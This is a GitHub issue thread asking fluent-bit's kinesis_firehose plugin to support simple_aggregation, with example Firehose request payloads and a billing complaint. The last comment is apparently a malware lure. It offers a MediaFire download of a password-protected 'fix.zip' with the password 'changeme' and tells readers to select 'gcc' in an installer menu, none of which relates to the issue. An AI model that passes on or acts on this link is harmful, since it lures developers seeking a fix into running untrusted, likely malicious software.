### ISSUE TITLE
[kinesis-firehose] Support simple_aggregation option to send multiple log events as a record

### ISSUE THREAD

**Issue by kangaechu** [fluent/fluent-bit#9279]
I changed the Firehose plugin from firehose (aws/amazon-kinesis-firehose-for-fluent-bit) to kinesis_firehose (core plugin) in my project, which caused a sharp increase in billing.

<img width="1632" alt="image" src="https://github.com/user-attachments/assets/443b21a5-0088-4577-9d71-9b719060bc82">

Upon investigation, we found that the firehose plugin supports simple_aggregation, so it was sending multiple records as a single event.

```
"{\"DeliveryStreamName\":\"fluent-bit--test\",\"Records\":[{\"Data\":\"(records encoded by BASE64)\"}]}"
```

However, kinesis_firehose does not support simple_aggregation, so events are created for each record.

```
"{\"DeliveryStreamName\":\"fluent-bit--test\",\"Records\":[
{\"Data\":\"（a record encoded by BASE64）\"},
{\"Data\":\"（a record encoded by BASE64）\"},
{\"Data\":\"（a record encoded by BASE64）\"},
{\"Data\":\"（a record encoded by BASE64）\"},
{\"Data\":\"（a record encoded by BASE64）\"},
{\"Data\":\"（a record encoded by BASE64）\"},
{\"Data\":\"（a record encoded by BASE64）\"},
{\"Data\":\"（a record encoded by BASE64）\"},
{\"Data\":\"（a record encoded by BASE64）\"},
{\"Data\":\"（a record encoded by BASE64）\"}]}"
```

There were plans to implement simple_aggregation when the kinesis_firehose plugin was created, but as of August 2024, it has not yet been implemented.

https://github.com/aws/amazon-kinesis-firehose-for-fluent-bit/issues/12#issuecomment-791648528

**Additional context**

- https://github.com/aws/amazon-kinesis-firehose-for-fluent-bit/pull/105
- https://github.com/aws/amazon-kinesis-firehose-for-fluent-bit/issues/12

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
